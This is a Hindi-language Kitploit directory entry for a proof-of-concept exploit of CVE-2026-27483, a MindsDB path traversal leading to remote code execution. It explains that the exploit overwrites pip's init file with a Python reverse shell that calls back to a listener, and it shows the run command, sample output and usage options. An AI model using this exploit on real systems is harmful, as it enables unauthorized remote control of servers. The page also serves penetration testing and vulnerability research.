Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-27483 — MindsDB पाथ ट्रैवर्सल से RCE PoC | Kitploit
उपकरण/GitHubGitHub/thewhiteh4t/cve-2026-27483
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubthewhiteh4t/cve-2026-27483

cve-2026-27483

MindsDB पाथ ट्रैवर्सल से RCE PoC

रिपॉजिटरी देखें
526 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-27483

MindsDB पथ ट्रैवर्सल से RCE PoC

यह PoC स्क्रिप्ट निम्नलिखित GitHub सलाह पर आधारित है।

  • डिफ़ॉल्ट रूप से MindsDB प्रमाणीकरण का उपयोग नहीं करता
  • PoC बिना प्रमाणीकरण और प्रमाणीकरण सहित दोनों मोड का समर्थन करता है।
  • हम उपलब्ध हैंडलर खोजने के लिए /api/handlers/ को क्वेरी कर सकते हैं, किसी भी उपलब्ध लेकिन इंस्टॉल न किए गए हैंडलर नाम का उपयोग करें।
  • PoC /venv/lib/python3.10/site-packages/pip/__init__.py को ओवरराइट करता है।
  • एक पायथन रिवर्स शेल उपरोक्त पथ पर लिखा जाता है और फिर ट्रिगर किया जाता है।
root@kitploit:~
python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password

-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------

[>] Found By : XlabAITeam
[>] PoC By   : Lohitya Pushkar (thewhiteh4t)

[>] Target   : http://127.0.0.1:47334
[>] LHOST    : 192.168.0.100
[>] LPORT    : 4444

[*] Checking status...

[*] MindsDB Version : 25.9.1.0
[+] Login successful!
[*] Uploading payload : qwvhotfj
[+] Payload uploaded!
[*] Triggering payload...

निर्भरताएँ

root@kitploit:~
pip3 install requests packaging

उपयोग

root@kitploit:~
python cve-2026-27483.py -h
usage: cve-2026-27483.py [-h] [-rh RH] [-rp RP] [-lh LH] [-lp LP] [-u U] [-p P]

options:
  -h, --help  show this help message and exit
  -rh RH      Target host
  -rp RP      Target port
  -lh LH      Listener host
  -lp LP      Listener port
  -u U        Username
  -p P        Password
टूल डाउनलोड करें